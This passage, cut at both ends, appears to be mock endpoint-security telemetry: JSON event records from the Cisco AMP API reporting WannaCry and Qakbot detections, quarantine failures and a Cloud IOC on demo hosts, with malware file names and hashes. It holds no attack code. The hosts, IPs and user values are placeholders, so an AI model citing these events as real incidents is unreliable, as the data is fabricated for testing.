Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867973","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":632000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867972","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":585000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867971","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":554000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":1064,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":460000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":1064,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462922463085000,"timestamp":1610629066,"timestamp_nanoseconds":103000000,"date":"2021-01-14T12:57:46+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6411462918168117251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462922463085000,"timestamp":1610629066,"timestamp_nanoseconds":103000000,"date":"2021-01-14T12:57:46+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6411462918168117252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462918168117000,"timestamp":1610629065,"timestamp_nanoseconds":573000000,"date":"2021-01-14T12:57:45+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411462918168117252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91","sha1":"75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12","md5":"a97fb86da4e010974860e5024137b56b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462918168117000,"timestamp":1610629065,"timestamp_nanoseconds":573000000,"date":"2021-01-14T12:57:45+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411462918168117251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91","sha1":"75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12","md5":"a97fb86da4e010974860e5024137b56b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":589000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411456342573187074","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":589000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411132837046517762","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":573000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411456342573187073","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":573000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411425813945647106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":589000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.GenericKD:Gen.20fu.1201","detection_id":"6411456342573187074","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11179468.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":589000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.GenericKD:Gen.20fu.1201","detection_id":"6411132837046517762","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11179468.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":558000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411456342573187073","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"AySxs.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\AySxs.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":542000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411425813945647106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"AySxs.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\AySxs.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1492784107692000800,"timestamp":1610627262,"timestamp_nanoseconds":692000000,"date":"2021-01-14T12:27:42+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Critical","start_timestamp":1610627262,"start_date":"2021-01-14T12:27:42+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.","short_description":"W32.Qakbot.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/Windows/SysWOW64/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"8063af71d08d015cc102788491c6274d3d33290b8dc41f91cc511a36fa0cba75"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1458626002840536600,"timestamp":1610627243,"timestamp_nanoseconds":268148295,"date":"2021-01-14T12:27:23+00:00","event_type":"Threat Detected in Low Prevalence Executable","event_type_id":1107296278,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583861114428195000,"timestamp":1610626750,"timestamp_nanoseconds":161000000,"date":"2021-01-14T12:19:10+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264747552596296000,"timestamp":1610626264,"timestamp_nanoseconds":27000000,"date":"2021-01-14T12:11:04+00:00","event_type":"File Fetch Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b","sha1":"5058b16a86beee96927371210b9a9f682976a50a","md5":"48a0bf05b9706a00d2a0ff6260412f11"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411444887895409000,"timestamp":1610625778,"timestamp_nanoseconds":756000000,"date":"2021-01-14T12:02:58+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Auto.A280012EEE.in10.tht.Talos","detection_id":"6411444887895408641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_2","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d1:e2:b6:61:ef:7a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"X4.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\X4.exe","identity":{"sha256":"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62","sha1":"c235e18bae63d6c4b5daadb833686f943de65a5f","md5":"a659ff79ef7ffacbd61d4c2641379e44"},"parent":{"process_id":4744,"disposition":"Clean","file_name":"wscript.exe","identity":{"sha256":"9c8a1b52a638ca87a5e7e60e635a3cbf89b04f5888995f55e2ad3d94ab009b97","sha1":"2131cff0959d213cd9a5e8a8ac362d265d5b1316","md5":"045451fa238a75305cc26ac982472367"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411444887895409000,"timestamp":1610625778,"timestamp_nanoseconds":772000000,"date":"2021-01-14T12:02:58+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6411444887895408641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_2","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d1:e2:b6:61:ef:7a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187549993959000,"timestamp":1610625537,"timestamp_nanoseconds":208000000,"date":"2021-01-14T11:58:57+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419187549993959449","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 